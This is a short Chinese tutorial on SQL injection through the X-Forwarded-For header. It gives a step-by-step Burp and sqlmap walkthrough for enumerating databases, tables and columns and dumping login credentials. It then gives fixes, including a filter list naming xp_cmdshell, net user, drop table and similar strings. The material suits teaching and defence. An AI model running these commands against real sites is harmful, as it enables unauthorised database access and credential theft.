XFF,是X-Forwarded-for的缩写,XFF注入是SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,从而得到网站的数据库内容。
漏洞前提:HTTP Header中存在X-Forwarded-for参数的调用。
检测方法:通过火狐的插件X-Forwarded-for header 1.0.1.1进行对本地IP地址进行修改,为其带入的IP地址加入敏感字符。
判断方法:修改后,找到网站登录页面或者其它功能交互页面,提交数据后,查看是否会报错,如果会报错,则说明存在该漏洞。
例子:
1.随意账号密码登陆,burp抓取数据包
2.再右键发送到repeater中添加参数:X—forwarded-for: * 保存.txt文件到sqlmap根目录下
3.对添加参数的POST包进行sql注入,利用sqlmap工具
4.命令python sqlmap.py -r 包保存的绝对路径
5.获取当前的数据库,命令:python sqlmap.py -r 文件路径 --current-db
6.查看所有数据库,防止用户名密码不在此数据库中(python sqlmap.py -r 文件路径 --database)
查看数据库中的表(python sqlmap.py -r 文件路径 -D 数据库名 --tables)
7.查看表中的字段(python sqlmap.py -r 文件路径 -D 数据库名 -T表名 --columns)
8.查看下级字段中的内容(python sqlmap.py -r 文件路径 -D 数据库名 -T 表名 -C"字段名") --dump
9.得到账号密码
修复方案:
1、过滤http头中的X-Forwarded-for header中的内容,不允许其插入敏感字符,过滤字符参考sql注入修复方案。
2、过滤以下敏感字符。需要过滤的特殊字符及字符串有:
net user
xp_cmdshell
add
exec master.dbo.xp_cmdshell
net localgroup administrators
select
count
Asc
char
mid
'
:
"
insert
delete from
drop table
update
truncate
from
%